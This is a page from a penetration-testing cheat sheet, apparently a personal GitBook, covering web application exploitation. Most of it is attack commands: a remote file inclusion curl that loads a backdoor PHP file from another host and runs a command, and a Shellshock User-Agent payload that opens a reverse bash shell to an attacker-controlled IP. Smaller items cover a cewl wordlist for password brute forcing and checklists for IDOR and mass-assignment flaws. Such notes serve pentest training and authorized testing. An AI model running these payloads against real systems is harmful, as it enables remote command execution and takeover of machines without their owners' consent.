📝
Basic Penetration Testing
  • About Knowledge
  • Server Enumeration
    • Scanning
    • Common Services
      • FTP - 21
      • SMTP - 25
      • SMB - 139, 445
  • Web Application
    • Enumeration
    • Exploitation
    • Execute Commands
    • Databases
      • MySQL
      • SQLite
      • MSSQL
      • PostgreSQL
  • Remote Code Execution
  • File Transfer
    • HTTP Server
    • SMB Protocol
    • FTP Server on Kali Linux
  • Hash Cracking
  • Privilege Escalation
    • Windows Privilege Escalation
    • Linux Privilege Escalation
  • Buffer Overflow
  • About LeeCyberSec
Powered by GitBook
On this page
  • WebShell
  • File Include
  • Shellshock POC
  • Virtual hosting
  • Brute Force Password
  • Create Passwd Directory
  • Authentication
  • Authorization

Was this helpful?

  1. Web Application

Exploitation

PreviousEnumerationNextExecute Commands

Last updated 4 years ago

Was this helpful?

curl http://target/?page=http://php/backdoor.php&cmd=id

curl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/$myip/445 0>&1'" http://$ip/cgi-bin/user.sh

Virtual hosting

Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server (or pool of servers).

Brute Force Password

Create Passwd Directory

cewl -m 5 http://$ip/joomla/ > passwd.txt

Authentication

  1. Check cookies

  2. Check "admin" and "Admin", "admin " and "admin"

  3. Check the redirection

Authorization

  1. Check IDOR

  2. Check .js, .json

  3. Check Object-relational mapping (&admin[admin]=1)

WebShell
File Include
Shellshock POC